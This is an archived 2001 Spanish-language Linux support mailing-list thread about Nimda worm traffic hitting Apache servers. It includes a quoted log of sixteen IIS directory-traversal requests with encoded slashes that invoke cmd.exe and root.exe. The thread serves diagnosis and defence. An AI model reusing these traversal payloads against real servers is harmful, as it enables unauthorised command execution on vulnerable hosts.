[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]
[Hilos de Discusión] [Fecha] [Tema] [Autor]Hola lista: Como puedo saber si mi server (LinuxPPP 6.4 y Apache 1.3.20) estan propagando el NIMDA o como protegerlo del mismo. Gracias Cristian Othon Martinez Vera wrote: > On Wed, 19 Sep 2001, David Alfredo Daza Padron wrote: > > > Me llama la atencion, pues dices que tu apache server esta registrando > > en su log > > este virus? lei los reportes de TrendMicro y el CERT y dicen que solo > > afectan > > a Win98 a 2000, podrias mandarnos una linea para conocer como registra > > tu log > > este virus? > > gracias > > > > "Juarez, Jose Antonio" wrote: > > > > > > Alguien sabe como hacer para que el archivo access.log no se vea afectado > > > por este virus...por que crece y crece.... > > > aunque a mi apache no le haga nada....aqui me pego en varias maquinas y de > > > momento lo unico que hago es mediante el cron, limpiarlo.....y por otro > > > lado, alguna solucion para el sendmail... algo asi como la hubo para el > > > redcode .... > > Una muestra de Nimda en accion: > > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 290 > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288 > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298 > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298 > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314 > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335 > 148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 363 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 275 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314 > 148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314 > > Este es un registro de un ataque sin éxito en contra de un servidor > Apache. Como veran, ejecuta un minimo de 16 'exploits' conocidos de > Win+IIS para tratar de penetrar al sistema. > > Saludos > -- > (o- Cristian Othon Martinez Vera <cfuga en itam mx> Pulchrum est paucorum > //\ http://eniac.rhon.itam.mx/~cfuga/ hominum. > v_/_ > > --------------------------------------------------------------------- > Lista de soporte de LinuxPPP > Reglas de la lista en http://linuxppp.com/reglas.html -- ******************************************************************** L.I. Luis Aaron Almanza Uribe Coordinador de Videoteca Sistema de Television y Radio de Campeche Tel. (9)8110491 8161261 ext. 126 Fax ext. 206 http://www.trc.campeche.gob.mx ICQ 78774052 Personal aaronalmanza en yahoo com mx Usuario Linux Registrado 178279 ******************************************************************** --------------------------------------------------------------------- Lista de soporte de LinuxPPP Reglas de la lista en http://linuxppp.com/reglas.html